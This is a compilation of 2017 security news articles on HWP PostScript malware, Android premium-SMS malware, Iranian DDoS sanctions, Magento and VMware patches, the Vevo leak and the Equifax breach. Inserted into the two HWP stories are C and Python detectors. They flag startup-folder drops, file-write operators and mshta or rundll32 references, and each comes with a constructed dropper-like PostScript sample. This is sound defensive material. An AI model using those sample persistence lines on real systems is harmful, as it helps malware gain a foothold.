Although the Encapsulated PostScript adds restrictions to secure the system while opening a document, the older HWP versions implement these restrictions improperly. The attackers have started using attachments containing malicious PostScript to drop shortcuts or malicious files onto the affected system.

Experts noticed that some of the subject lines and document names used by attackers include “Bitcoin” and “Financial Security Standardization”.

[Image: Hangul Word Processor]

Researchers highlighted that the attackers don’t use an actual exploit but abuse a feature of PostScript to manipulate files.

PostScript doesn’t have the ability to execute shell commands, but attackers obtain a similar effect by dropping files into various startup folders; these files are then executed when the user reboots the machine.

“Some of the ways we’ve seen this include:

Drops a shortcut in the startup folder, which executes MSHTA.exe to execute a Javascript file.
Drops a shortcut in the startup folder and a DLL file in the %Temp% directory. The shortcut calls rundll32.exe to execute the said DLL file.
Drops an executable file in the startup folder.”

reads the analysis.

One of the attacks observed by Trend Micro researchers overwrites the file gswin32c.exe, the PostScript interpreter used by the Hangul Word Processor application. The file is replaced with a legitimate copy of Calc.exe; in this way the attackers prevent the execution of other embedded PostScript content.

Newer versions of the Hangul Word Processor implement EPS properly; for this reason, users should upgrade the application to stay protected.
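A defender-side check for the behaviour described above, as an added example (not Trend Micro’s code): a small PostScript tokenizer that flags the primitives these attachments rely on, namely files opened for writing, the deletefile/renamefile/copyfile operators, and string literals that name a Startup folder, %Temp%, mshta or rundll32. The two EPS inputs are constructed samples; scan_postscript and its helpers are hypothetical names.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Findings reported by scan_postscript(), as a bitmask. */
enum {
    PS_WRITE_FILE    = 1,  /* "(path) (w) file": a file opened for writing    */
    PS_FILE_MUTATION = 2,  /* deletefile / renamefile / copyfile operators     */
    PS_STARTUP_PATH  = 4,  /* string literal naming a Startup folder or %Temp% */
    PS_LOLBIN_REF    = 8   /* string literal mentioning mshta or rundll32      */
};

#define MAX_TOK 512

/* Case-insensitive substring test (hypothetical helper, not a libc call). */
static int contains_ci(const char *hay, const char *needle)
{
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t i = 0;
        while (i < n && hay[i] &&
               tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i]))
            i++;
        if (i == n) return 1;
    }
    return 0;
}

/* Copy a PostScript string literal starting at '(' into out, honouring nested
   parentheses and backslash escapes; returns the position after the literal. */
static const char *read_string(const char *p, char *out)
{
    int depth = 1;
    size_t n = 0;
    for (p++; *p && depth > 0; p++) {
        if (*p == '\\' && p[1]) p++;                 /* escaped byte: keep it */
        else if (*p == '(') depth++;
        else if (*p == ')' && --depth == 0) { p++; break; }
        if (n < MAX_TOK - 1) out[n++] = *p;
    }
    out[n] = '\0';
    return p;
}

/* Copy a bare token (name or operator) into out; returns the next position. */
static const char *read_token(const char *p, char *out)
{
    size_t n = 0;
    while (*p && !isspace((unsigned char)*p) && !strchr("()<>[]{}/%", *p)) {
        if (n < MAX_TOK - 1) out[n++] = *p;
        p++;
    }
    out[n] = '\0';
    return p;
}

/* Walk the PostScript source and return PS_* findings as a bitmask. A window of
   the two previous tokens is enough to recognise "(path) (w) file". */
int scan_postscript(const char *src)
{
    int findings = 0, prev1_str = 0, prev2_str = 0;
    char tok[MAX_TOK], prev1[MAX_TOK] = "", prev2[MAX_TOK] = "";
    const char *p = src;

    while (*p) {
        int is_str = 0, is_name = 0;
        if (isspace((unsigned char)*p)) { p++; continue; }
        if (*p == '%') { while (*p && *p != '\n') p++; continue; }   /* comment */
        if (*p == '(')      { p = read_string(p, tok); is_str = 1; }
        else if (*p == '/') { p = read_token(p + 1, tok); is_name = 1; } /* literal name */
        else if (strchr("<>[]{})", *p)) { p++; continue; }            /* other delimiters */
        else { p = read_token(p, tok); if (!tok[0]) { p++; continue; } }

        if (is_str) {
            if (contains_ci(tok, "startup") || contains_ci(tok, "%temp%"))
                findings |= PS_STARTUP_PATH;
            if (contains_ci(tok, "mshta") || contains_ci(tok, "rundll32"))
                findings |= PS_LOLBIN_REF;
        } else if (!is_name) {
            /* "file" with a write/append access string and a path beneath it */
            if (!strcmp(tok, "file") && prev1_str && prev2_str &&
                (prev1[0] == 'w' || prev1[0] == 'a'))
                findings |= PS_WRITE_FILE;
            if (!strcmp(tok, "deletefile") || !strcmp(tok, "renamefile") ||
                !strcmp(tok, "copyfile"))
                findings |= PS_FILE_MUTATION;
        }
        strcpy(prev2, prev1); prev2_str = prev1_str;
        strcpy(prev1, tok);   prev1_str = is_str;
    }
    return findings;
}

/* Constructed samples: a harmless EPS drawing, and one that only mimics the
   file operations Trend Micro describes (no real payload). */
static const char *BENIGN_EPS =
    "%!PS-Adobe-3.0 EPSF-3.0\n"
    "%%BoundingBox: 0 0 200 100\n"
    "/Helvetica findfont 12 scalefont setfont\n"
    "10 40 moveto (Hello (EPS) world) show\n"
    "showpage\n";

static const char *DROPPER_EPS =
    "%!PS-Adobe-3.0 EPSF-3.0\n"
    "/out (C:\\\\Users\\\\u\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\"
    "Start Menu\\\\Programs\\\\Startup\\\\update.lnk) (w) file def\n"
    "out (rundll32.exe %Temp%\\\\svc.dll,Run) writestring\n"
    "out closefile\n";

int main(void)
{
    printf("benign : 0x%x\n", scan_postscript(BENIGN_EPS));   /* 0x0 */
    printf("dropper: 0x%x\n", scan_postscript(DROPPER_EPS));  /* 0xd */
    return 0;
}
```

Any non-zero result is a reason to quarantine the attachment for analysis; a drawing-only EPS never needs write access, file mutation operators or Windows paths.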

“Newer versions of the Hangul Word Processor implement EPS correctly, with the 2014 versions and later not being susceptible to this problem. We suggest upgrading to these newer, safer versions.” Trend Micro says.


Millions Download "ExpensiveWall" Malware via Google Play
18.9.2017 securityweek Android
A newly discovered Android malware that managed to infect at least 50 applications in Google Play has been downloaded between 1 million and 4.2 million times, Check Point researchers warn.

Dubbed ExpensiveWall, the threat was designed to send fraudulent premium SMS messages and to charge users’ accounts for fake services without their knowledge.

The total number of affected users, Check Point says, could be between 5.9 million and 21.1 million, as ExpensiveWall is a variant of malware found in Google Play earlier this year. Unlike previous iterations, however, the new sample uses advanced obfuscation techniques to evade Google Play’s built-in anti-malware protections.

The first time the malware was detailed was in January 2017, when McAfee warned that a highly popular app called “I Love Filter” was in fact an SMS Trojan. The security researchers discovered that someone infected the free legitimate app Retro Live and that the Trojan would charge users via SMS messages while also leaking device and user information such as phone number, GPS location, installed apps, and IP address.

In a technical report describing the threat, Check Point reveals that this first variant of the malware wasn’t obfuscated. The security firm also notes that, while ExpensiveWall represents the obfuscated variant of the malware, there is also a third version that only contains the malicious code, but isn’t active.

“After analyzing different samples of the malware, Check Point mobile threat researchers believe ExpensiveWall is spread to different apps as an SDK called ‘gtk’, which developers embed in their own apps,” the researchers note.

ExpensiveWall was first observed on August 7, 2017. Check Point informed Google of it and the reported samples were removed from the store. Within days, another sample infiltrated Google Play and was downloaded more than 5,000 times before being removed.

The malware was designed to register victims to premium services without their knowledge, thus generating profits for its operators. However, the same infrastructure could easily be modified by other malware to spy on victims by capturing photos and recording audio, and even to steal sensitive data and send it to a command and control (C&C) server.

“Since the malware is capable of operating silently, all of this illicit activity takes place without the victim’s knowledge, turning it into the ultimate spying tool,” Check Point argues.

Once installed, ExpensiveWall requests several common permissions, such as Internet access, and SMS permissions. Given that many apps might request similar permissions, most users might grant them without questioning the app’s intentions, especially when installing from Google Play.

The malware then sends device data to its C&C server, including location and unique identifiers, such as MAC address, IP addresses, IMSI, and IMEI. Each time the device is switched on or its connectivity changes, the threat connects to the C&C to receive a URL.

The received page contains “malicious JavaScript code that can invoke in-app functions using JavascriptInterface, like subscribing them to premium services and sending SMS messages. The malware initiates the JavaScript code by silently clicking on the links in the webpage, in the same way it clicks on ads in other occasions,” the researchers explain.

After obtaining the device’s phone number, the malware uses it to subscribe the user to different paid services. While in some cases the activity is performed without notifying the user, in others the user is asked to click a “Continue” button to activate the subscription or send a premium SMS.

Check Point has provided a list of all infected applications detected to date. Users who might have installed any of them should manually uninstall the apps from their devices. Although Google removed the impacted software from Google Play, the infected devices haven’t been cleaned.


US Treasury announced sanctions against seven Iranian nationals and other entities
18.9.2017 securityaffairs BigBrothers

The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned 11 entities and Iranian nationals for malicious cyber-enabled activity.
The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned 11 entities and individuals for malicious cyber-enabled activity.
The US Department of the Treasury announced sanctions against 7 Iranian nationals and two security firms for ‘malicious cyber-activity’ against US entities.

The seven Iranians were employed by ITSecTeam (ITSEC) and Mersad Company (MERSAD), both private companies working for the Iranian government and the Islamic Revolutionary Guard.

Iran’s Islamic Revolutionary Guard Corps is a branch of Iran’s Armed Forces founded after the Iranian Revolution, on 5 May 1979.
The Iranian nationals were indicted by the US Department of Justice in early 2016, when US authorities charged seven Iranian hackers with attacking computer systems at banks and a dam in New York.

Now the Treasury’s Office of Foreign Assets Control (OFAC) has sanctioned a total of 11 Iranian entities and individuals for alleged support of hacking activities, as well as two Iran-based networks that were involved in massive distributed denial-of-service attacks targeting US financial institutions in 2012.

“OFAC designated private Iranian computer security company ITSec Team pursuant to E.O. 13694 for causing a significant disruption to the availability of a computer or network of computers. Between approximately December 2011 and December 2012, ITSec Team planned and executed distributed denial of service (DDoS) attacks against at least nine large U.S. financial institutions, including top U.S. banks and U.S. stock exchanges. During that time, ITSec Team performed work on behalf of the Iranian Government, including the IRGC.” states the press release issued by the US Treasury.

“OFAC also designated three Iranian nationals for acting for or on behalf of ITSec Team. Ahmad Fathi was responsible for supervising and coordinating ITSec Team’s DDoS attacks against the U.S. financial sector. Amin Shokohi, a computer hacker who worked for ITSec Team, helped build the botnet that ITSec Team used in its DDoS attacks against U.S. financial institutions. Hamid Firoozi, a network manager at ITSec Team, procured computer servers for the botnet that ITSec Team used in its DDoS activities targeting the U.S. financial sector.”

[Image: Iranian nationals sanctioned]

Ahmad Fathi, 37; Hamid Firoozi, 34; Amin Shokohi, 25; Sadegh Ahmadzadegan, aka Nitr0jen26, 23; Omid Ghaffarinia, aka PLuS, 25; Sina Keissar, 25; and Nader Saedi, aka Turk Server, 26, were charged with launching DDoS attacks against 46 organizations, most of them US financial institutions, from late 2011 to mid-2013.

Firoozi was also charged with hacking into a server at a New York dam between August and September 2013.

“Hamid Firoozi, a network manager at ITSec Team, procured computer servers for the botnet that ITSec Team used in its DDoS activities targeting the U.S. financial sector.” continues the press release.

The Treasury Department has decided to block all property and interests in property of the Iranian entities, and U.S. citizens are generally prohibited from engaging in transactions with them.
“As a result of today’s actions, all property and interests in property of those designated subject to U.S. jurisdiction are blocked, and U.S. persons are generally prohibited from engaging in transactions with them.” states the press release. “In addition, foreign financial institutions that facilitate significant transactions for, or persons that provide material or certain other support to, the entities and individuals designated today risk exposure to sanctions that could sever their access to the U.S. financial system or block their property and interests in property under U.S. jurisdiction.”
Of course, any foreign financial institution that supports the sanctioned individuals or entities will also face possible sanctions.


MAGENTO 2.0.16 and 2.1.9 security update fixes critical flaw in the platform
7.9.2017 securityaffairs Vulnerability

Magento released updates for Magento Commerce and Open Source 2.1.9 and 2.0.16 that fixed also a critical remote code execution vulnerability.
Magento released updates for Magento Commerce and Open Source 2.1.9 and 2.0.16 that fixed numerous flaws, including a critical remote code execution vulnerability.

The remote code execution flaw affects the content management system (CMS) and layouts; it could be exploited by an administrator with limited privileges to add malicious code when creating a new CMS page.

“A Magento administrator with limited privileges can introduce malicious code when creating a new CMS Page, which could result in arbitrary remote code execution.” states the security advisory.

The vulnerability affects Magento Open Source prior to 1.9.3.6, Magento Commerce prior to 1.14.3.6, Magento 2.0 prior to 2.0.16, and Magento 2.1 prior to 2.1.9 and has been addressed in Magento Open Source 1.9.3.6, Magento Commerce 1.14.3.6, SUPEE-10266, Magento 2.0.16, and Magento 2.1.9.

The company also addressed three High severity vulnerabilities affecting Magento 2.0 prior to 2.0.16 and Magento 2.1 prior to 2.1.9.

The list of the flaws includes a cross-site request forgery (CSRF) issue, an unauthorized data leak, and an authenticated Admin user remote code execution vulnerability.

“Magento Commerce and Open Source 2.1.9 and 2.0.16 contain multiple security enhancements that help close cross-site request forgery (CSRF), unauthorized data leak, and authenticated Admin user remote code execution vulnerabilities. These releases also include support for the changes to the USPS shipping rates that the USPS introduced on September 1, 2017.” states the advisory.

The update also addresses a total of 28 Medium risk vulnerabilities, including abuse of functionality, information leak, Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS, stored), unvalidated redirection, remote code execution, insufficient session expiration, Denial of Service (DoS), and Insecure Direct Object Reference (IDOR).

The exploitation of the flaws opens the door to various attacks, including man-in-the-middle attacks, redirection of users to an external site, or cookie reuse.

Other vulnerabilities can be exploited by local admins using the sitemap generation tool to arbitrarily overwrite sensitive files; to inject code or executable scripts; to inject code into sales order records to launch an XSS attack on anyone who views the page; to create URLs for CSRF attacks; to add new SVG images that contain injected code; or to modify the page counter to cause an integer overflow that prevents the creation of new pages.

The company also fixed two Low-risk vulnerabilities: a bug in the account lockout mechanism, which leaks a site’s contact e-mail, and an IDOR that allows a logged-in user to modify order fields that they do not have permission to view.


OurMine hacked Vevo and leaked 3.12 TB of internal files, then deleted them
7.9.2017 securityaffairs CyberCrime

The notorious OurMine hacker crew has claimed responsibility for the breach of the popular video streaming service Vevo.
Another major data breach has made the headlines; this time the victim is the popular video streaming service Vevo, which was hacked by the well-known hacking group OurMine.

Vevo is an American multinational video hosting service founded on December 8, 2009, as a joint venture between the “big three” record companies, Universal Music Group (UMG), Sony Music Entertainment (SME) and Warner Music Group (WMG).

It is also partly owned by Abu Dhabi Media, the official media organization of the Government of Abu Dhabi, and by Alphabet Inc., the parent company of Google.

The notorious Saudi Arabian OurMine group has hacked Vevo and leaked about 3.12 TB worth of internal files.

[Image: vevo hack ourmine]
OurMine accessed Vevo’s data including internal sensitive office documents, videos, and promotional materials.

[Image: vevo hack ourmine 2]
OurMine leaked the huge trove of data, roughly 3.12 terabytes stolen from the servers of the company, on its website on late Thursday.

Later the company removed the stolen information from the website on Vevo’s request.

OurMine group leaked data from Vevo after one of its employees was disrespectful to an OurMine member on LinkedIn.

OurMine first attempted to warn Vevo of the data breach privately; unfortunately for the company, one of its employees responded, “F*** off, you don’t have anything,” and in response the hacker group went public with the data breach and leaked the Vevo files.

OurMine shared the following motivation about the hack.

“We leaked it because yesterday we’ve talked with an employee from VEVO about the leak, and that’s what he said:”

[Image: OurMine hacked Vevo]

At the time of writing, most of the links redirect to a Vevo Box.com login page; a notice states that OurMine “deleted the files because of a request from VEVO.”
According to Gizmodo, which first reported the data breach, the “majority of the [leaked] files seemed pretty mild—weekly music charts, pre-planned social media content, and various details about the artists under the record companies’ management,” albeit a few documents contained sensitive materials.

Variety, who analyzed the stolen documents, reported that the leaked archive included notes on around 90 artists.

“The 3.12-terabyte trove of stolen documents included Vevo’s internal dossiers on about 90 artists, including Ariana Grande, Britney Spears, Calvin Harris, Florida Georgia Line, Jennifer Lopez, Justin Bieber, Katy Perry, Madonna, One Direction, Sia, Taylor Swift, The Weeknd, and U2.” states Variety.

OurMine did not provide details of the hack, or information about how long they had been accessing the Vevo servers or whether they had accessed financial data and credentials.
Responding to a Gizmodo inquiry, a Vevo spokesperson told Gizmodo that the company “can confirm that Vevo experienced a data breach as a result of a phishing scam via Linkedin. We have addressed the issue and are investigating the extent of exposure.”
The OurMine hacker group recently defaced the WikiLeaks website with a DNS redirect; it has also hijacked the official Twitter and Facebook accounts of Sony PlayStation Network (PSN) and claimed to have stolen the PSN database.

The notorious Saudi Arabian group also hacked social media accounts of HBO and Game of Thrones.

OurMine hacked the Netflix US Twitter account (@Netflix) in December to promote its website and hacking services, and it is known for its attacks against high-profile Twitter accounts. The list of victims is very long and includes Mark Zuckerberg, Twitter co-founder Evan Williams, David Guetta, Spotify CEO and founder Daniel Ek, former Twitter CEO Dick Costolo, Twitter CEO Jack Dorsey, Google CEO Sundar Pichai, and many others.


Equifax- or the new gold standard for “how not to do Incident Response”!
7.9.2017 securityaffairs CyberCrime

The cybersecurity expert Stuart Peck, Director of Cyber Security Strategy at ZeroDayLab, shared his view on the Equifax data breach.
For those of you who have been living under a rock this week, Equifax suffered a major security breach, which led to over 143 million records being stolen by attackers. The information held by Equifax is highly sensitive, especially for US citizens, whose personal and financial information, including SSNs (Social Security Numbers) and credit card data, was stolen by the attackers. There is the possibility that over 44 million records in the UK and Canada may also be affected.

What might be news to you is that this breach happened in May this year, with the attackers remaining undetected by Equifax security teams until July 29th. Initial indications point towards the attacker(s) exploiting a vulnerability in Apache Struts, giving them access to a vast amount of information. What Equifax has not fully confirmed is whether the core database, which includes credit file reports, has also been compromised by the attackers.


So why is this the new gold standard for “how not to do Incident Response”?

There are very many ways Equifax could have handled this breach better, probably more than I can fit into a 700-word article; however, I will try to address the main points here.

If you know about a security breach come out quickly with an accurate and strong message
What’s interesting, and also disastrous for Equifax, is that the business knew about a significant breach in their information systems for almost 2 months before publicly announcing the incident. Now, this alone would be enough to damage any potential empathy from their customers if they came out with a “we are a victim too” angle.

However, Equifax committed the Incident Response cardinal sin: they protected their own interests before those of the customers they clearly let down, with key shareholders dumping their stock before the breach was publicly announced!

Because Equifax had put their interests first (or created that perception), a potential “we’re a victim too” card was no longer a viable option from a crisis communications perspective; consequently, the business created a mob and made themselves a bigger target for hacktivist groups.

Have a clear plan for how you are going to communicate with your customers and update them.
When Equifax came out with a message about the security breach, they created a website in August, ironically called Equifaxsecurity2017.com, to drive customers to, mainly so they could check whether their details were included in the incident and get some advice on what they should do.


In principle this is a good idea; in reality it looked like a phishing website, especially the Trustedidpremier.com site where customers could check whether they had been affected by the breach. Both caused confusion among customers who were, at that point, already in a heightened state of paranoia.


What Equifax should have done is notify all their customers by post, with a clear and concise message on what the affected customers should do and, most importantly, on how Equifax is going to protect and compensate their customers, on their main website! They had almost 2 months to prepare, so there are really no excuses.

Ensure you plug those holes! And check your IR plan is actually working.
When in a heightened state of security it’s easy to focus on the incident in hand; in fact, most breaches I’ve personally investigated have quickly led to a follow-up breach because everyone is busy trying to work out how they got breached in the first place… an all-hands-to-the-pump response leads to a blinkered approach where obvious holes are missed.


Unfortunately for Equifax, a site in Argentina was taken offline due to another potential security breach or security configuration issue, with the site having an admin username and admin password. With the press hot on the heels of anything related to Equifax, the business cannot afford another mistake, especially relating to PII or credit card information.


How not to undertake IR like Equifax

Equifax could have turned this incident into an opportunity to control the narrative of this breach, but a short-sighted strategy and what from the outside seems to be a very immature incident response and crisis communication process have led to the media controlling the message.

When facing into the abyss of a major incident what should you be doing?

In essence: train like an athlete and stress test your incident response plan, and if you don’t have one, well, that is the logical first step.
Having a set of relevant runbooks/playbooks that outline the key steps to undertake in any given incident scenario will reduce the inevitable impact of a major security incident.
Train your support, IT/Networks, Security, and applications teams on the principles of containing incidents and supporting technical investigations.
Ensure Executives and key business people are trained on internal and, most importantly, external communications relating to Security Incidents. The first person speaking should be the CIO/CISO, then your CEO.
Run real-world desktop and technical scenarios to identify weaknesses or issues with your plan.
Do the right thing for your customers as well as your business; not coming out quickly, especially with GDPR looming, can lead to exponential fines and loss of or damage to reputation.
If you work on these areas you should be in a stronger position when faced with the perfect storm of incidents.

Finally, remember the incident isn’t over until it really is over!



Hackers are offering Equifax data for sale, but they are scammers
7.9.2017 securityaffairs CyberCrime

It has happened: the information stolen in the recent Equifax data breach is being offered for sale on the dark web by crooks, but watch out, they are scammers.
Equifax discovered the intrusion on July 29, but the agency notified customers of the incident only 3 months later (on September 7); the intrusion itself occurred between mid-May and late July. The breach affects roughly 143 million U.S. consumers and involves names, social security numbers, dates of birth, addresses and, in some cases, driver’s license numbers, credit card numbers and dispute documents.

Now security experts warn that hackers are offering the precious data for sale, and have urged users to be vigilant about phishing attempts and scams.

The U.S. Federal Trade Commission (FTC), which is investigating the incident, issued an alert regarding scam phone calls.

“Ring, ring. ‘This is Equifax calling to verify your account information.’ Stop. Don’t tell them anything. They’re not from Equifax. It’s a scam. Equifax will not call you out of the blue,” states the FTC alert.

“That’s just one scam you might see after Equifax’s recent data breach. Other calls might try to trick you into giving your personal information.”

Shortly after the Equifax data breach was disclosed, various hackers started offering the data, but without demonstrating that they actually possessed it.

Many websites appeared on the Tor network; in one case hackers set up a site to blackmail Equifax, requesting a payment of 600 bitcoin (roughly $2.7 million) to avoid the release of all the data except the credit card numbers.

It was a hoax, and once it was discovered the hackers closed the website.

“Shortly after this breach was made public, a darknet website had popped up claiming to be selling access to the Equifax data. The hackers claim that they did not anticipate receiving such a trove of data, and need to monetize the attack quickly. They state that they will release the entire data set on September 15th, 2017 (one week from the time of the writing). They are asking for 600 BTC, or ~$2.6 million USD,” reported Weapons Grade Shinanigans.


Catalin Cimpanu (@campuscodi) tweeted on Sep 8, 2017: “Dark Web portal claiming to sell Equifax data badtouchyonqysm3[.]onion #Equifax #databreach”

Recently a group calling itself Equihax started a crowdfunding campaign to collect 600 bitcoin or 8,400 Ethereum to release the precious data; the hackers also offered 1 million data entries for 4 bitcoin ($12,500).


The hackers leaked the records of Donald Trump, Kim Kardashian, and Bill Gates to prove the authenticity of the data and shared many screenshots purportedly demonstrating access to the Equifax system.

This too was a scam: the leaked data were already available online, while the screenshots were clearly forged.

It is easy to predict that other scam websites offering the Equifax data will emerge on the darknet.


Equifax Security Chief, CIO to 'Retire' Immediately
16.9.2017 securityweek CyberCrime
Following the massive data breach that was disclosed on September 7, Equifax announced on Friday that Chief Security Officer Susan Mauldin and Chief Information Officer David Webb are retiring from the company effective immediately.

Russ Ayres, who previously served as a Vice President in the Equifax IT department, has been appointed interim Chief Security Officer.

Mark Rohrwasser has been appointed interim Chief Information Officer. Rohrwasser joined Equifax in 2016 and has led Equifax's International IT operations since that time, the company said.

Ayres will report directly to Rohrwasser.

Equifax informed customers last week that hackers had access to its systems between mid-May and late July. The breach, which affects roughly 143 million U.S. consumers, involved names, social security numbers, dates of birth, addresses and, in some cases, driver’s license numbers.

The company has hired FireEye-owned breach investigations firm Mandiant to work on the investigations, and noted that "Equifax's internal investigation of this incident is still ongoing and the company continues to work closely with the FBI in its investigation."

Equifax initially only revealed that the cybercriminals exploited a vulnerability in a “U.S. website application” to access files. However, financial services firm Baird later claimed to have learned that the application in question was Apache Struts, a framework used by many top organizations to create web apps.

While some believed that the Apache Struts vulnerability was the recently patched CVE-2017-9805, which has been increasingly exploited in the wild to deliver malware, a more likely candidate was CVE-2017-5638, a vulnerability disclosed and fixed in March, and leveraged by cybercriminals shortly after.

An update posted by Equifax on Wednesday to the website dedicated by the company to the cybersecurity incident confirms that CVE-2017-5638 was the Apache Struts 2 flaw exploited by attackers.

This shows that the breach was possible due to the company’s failure to patch a critical vulnerability for more than two months after its disclosure. Following the incident, others started highlighting holes in Equifax’s cyber security, including unpatched cross-site scripting (XSS) vulnerabilities reported to the company more than one year ago, and the lack of many basic protections.

Security blogger Brian Krebs reported on Tuesday that an Equifax Argentina employee portal exposed 14,000 records, including employee credentials and consumer complaints.

After New York Attorney General Eric T. Schneiderman announced the launch of a formal investigation into the Equifax breach, Illinois and nearly 40 other states joined the probe.

Equifax shares have fallen more than 30% since the disclosure of the breach, wiping more than $5 billion off the company’s market capitalization.

Equifax says that it maintains data on more than 820 million consumers and more than 91 million businesses worldwide.


HWP Documents and PostScript Abused to Spread Malware
16.9.2017 securityweek Virus
A recent malware attack has been leveraging the Hangul Word Processor (HWP) word processing application and its ability to run PostScript code, Trend Micro reveals.

Highly popular in South Korea, HWP has long been used in targeted attacks to perform reconnaissance or to spread remote access Trojans. In some attacks, the HWP documents were used alongside JPG, PDF, XLS, and other file formats.

As part of the recent incidents, the attackers abused HWP in association with PostScript, a language originally used for printing and desktop publishing. The campaign relies on emails containing malicious attachments to distribute malware, the researchers say.

Although a branch of PostScript called Encapsulated PostScript adds restrictions so as to make the opening of documents safer, older HWP versions implement these restrictions improperly. As a result, attackers have started using attachments containing malicious PostScript to drop shortcuts (or actual malicious files) onto the affected system.

The attack relies solely on PostScript to gain a foothold on a victim’s machine and doesn’t use an actual exploit, the researchers say. Instead, it abuses a feature of PostScript that can manipulate files.

Although the language doesn’t have the ability to execute shell commands, it is used to drop files into various startup folders. Thus, these files are executed when the user reboots their machine.

The attack is used not only to drop executable files in the startup folder, but also to drop a shortcut that executes MSHTA.exe to run a JavaScript file. In other attacks, a shortcut is dropped in a startup folder along with a DLL file in the %Temp% directory; the shortcut calls rundll32.exe to execute that DLL.

One of the observed samples, Trend Micro says, overwrites the file gswin32c.exe – the PostScript interpreter used by HWP – with a legitimate copy of Calc.exe, so that other embedded PostScript content cannot be executed.

Because newer versions of the Hangul Word Processor implement EPS correctly, users are advised to upgrade the application to stay protected. The 2014 versions and later aren’t susceptible to this type of attack, Trend Micro says.
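As an added defensive example (not Trend Micro’s or Hancom’s code): a small static triage routine for PostScript extracted from an HWP or EPS attachment. It looks for the PostScript file operators the attack above depends on, for startup/drop locations, and for the mshta.exe and rundll32.exe references the write-up names, so a mail gateway or sandbox can quarantine the document before anyone opens it. It assumes the PostScript stream has already been pulled out of the HWP container as text; the samples are constructed and carry no payload.

```python
"""Static triage of PostScript extracted from HWP/EPS attachments (added example).

The attack needs no exploit: PostScript's own file operators write a shortcut
or binary into a Windows startup folder (or a DLL into %Temp%) so it runs at
the next boot. Flag those operators, the drop locations and the LOLBins.
"""
import re

# PLRM file operators; `file` only matters with a write/append access string.
WRITE_OPEN_RE = re.compile(r"\(\s*(?:w\+|a\+|r\+|w|a)\s*\)\s*file\b")
FILE_OPS_RE = re.compile(r"\b(deletefile|renamefile|writestring|writehexstring)\b")
# Drop / persistence locations used by the samples in the write-up.
DROP_PATH_RE = re.compile(
    r"start\s*menu[/\\]+programs[/\\]+startup|[/\\]startup[/\\]|%temp%|appdata", re.I
)
LOLBIN_RE = re.compile(r"\b(mshta|rundll32)(?:\.exe)?\b", re.I)
ARTIFACT_RE = re.compile(r"\.(lnk|dll|exe|js)\b", re.I)
# An EPS header promises restricted behaviour; file writes contradict it.
EPS_HEADER_RE = re.compile(r"^%!PS-Adobe-\d\.\d\s+EPSF-", re.M)


def triage_postscript(text):
    """Return {'verdict': 'clean'|'medium'|'high', 'findings': [...]}."""
    findings = []
    if WRITE_OPEN_RE.search(text):
        findings.append("file opened for writing")
    ops = sorted({m.group(1) for m in FILE_OPS_RE.finditer(text)})
    if ops:
        findings.append("file operators: " + ", ".join(ops))
    manipulates_files = bool(findings)

    drop = bool(DROP_PATH_RE.search(text))
    if drop:
        findings.append("startup/drop location referenced")
    lolbins = sorted({m.group(1).lower() for m in LOLBIN_RE.finditer(text)})
    if lolbins:
        findings.append("LOLBin referenced: " + ", ".join(lolbins))
    artifacts = sorted({m.group(1).lower() for m in ARTIFACT_RE.finditer(text)})
    if artifacts:
        findings.append("executable artifact extension: " + ", ".join(artifacts))
    if manipulates_files and EPS_HEADER_RE.search(text):
        findings.append("declares EPSF yet manipulates files")

    if manipulates_files and (drop or lolbins or artifacts):
        verdict = "high"      # writes files AND points at persistence/LOLBins
    elif manipulates_files or drop or lolbins:
        verdict = "medium"    # one ingredient alone: worth an analyst's look
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings}


# --- constructed samples (not real malware) ---------------------------------
BENIGN_EPS = (
    "%!PS-Adobe-3.0 EPSF-3.0\n"
    "%%BoundingBox: 0 0 200 100\n"
    "/Helvetica findfont 12 scalefont setfont\n"
    "10 40 moveto (Quarterly figures) show\n"
    "showpage\n"
)
STARTUP_DROPPER_EPS = (
    "%!PS-Adobe-3.0 EPSF-3.0\n"
    "% constructed: opens a write handle inside the user's Startup folder\n"
    "(C:/Users/Public/Start Menu/Programs/Startup/update.lnk) (w) file\n"
    "/out exch def\n"
    "out (PLACEHOLDER-BYTES) writestring\n"
    "out closefile\n"
)
TEMP_SCRATCH_PS = (
    "%!PS-Adobe-3.0\n"
    "% constructed: scratch output outside any persistence location\n"
    "(/tmp/render-cache.dat) (w+) file closefile\n"
)

if __name__ == "__main__":
    for label, sample in [("benign", BENIGN_EPS), ("dropper", STARTUP_DROPPER_EPS),
                          ("scratch", TEMP_SCRATCH_PS)]:
        print(label, triage_postscript(sample))
```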


VMware Patches Critical SVGA Code Execution Flaw
16.9.2017 securityweek Vulnerebility
Patches released this week by VMware address several vulnerabilities, including one rated critical, in the company’s ESXi, vCenter Server, Workstation and Fusion products.

The flaw considered critical, tracked as CVE-2017-4924, is an out-of-bounds write issue in the SVGA device, an old virtual graphics card implemented by VMware virtualization products. The vulnerability can allow a guest to execute code on the host, VMware said.

Nico Golde and Ralf-Philipp Weinmann of Comsecuris UG reported the security hole to VMware via the Zero Day Initiative (ZDI) on June 22. In its own advisory, ZDI pointed out that an attacker must somehow gain the ability to execute low-privileged code on the guest in order to exploit the flaw.

“The specific flaw exists within the Shader implementation,” ZDI said. “The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the host OS.”

While VMware has classified the vulnerability as critical, ZDI has only assigned it a CVSS score of 6.2, which puts it in the medium severity category. ESXi 6.5, Workstation 12.x and Fusion 8.x on OS X are affected.

The second vulnerability patched this week, classified as medium severity and tracked as CVE-2017-4925, was discovered by Zhang Haitao. He noticed that ESXi, Workstation and Fusion have a NULL pointer dereference vulnerability caused by the handling of guest RPC requests. An attacker with normal user privileges can exploit this flaw to crash the VM.

This weakness affects ESXi 5.5, 6.0 and 6.5, Workstation 12.x and Fusion 8.x on OS X.

The third vulnerability, also rated medium severity, was found by Thomas Ornetzeder and it’s tracked as CVE-2017-4926. Ornetzeder discovered that the vCenter Server H5 Client on version 6.5 contains a stored cross-site scripting (XSS) flaw. An attacker that has VC user privileges can inject malicious JavaScript code that will be executed when other users access that page.


Chrome to Label FTP Resources as "Not Secure"
15.9.2017 securityweek Safety
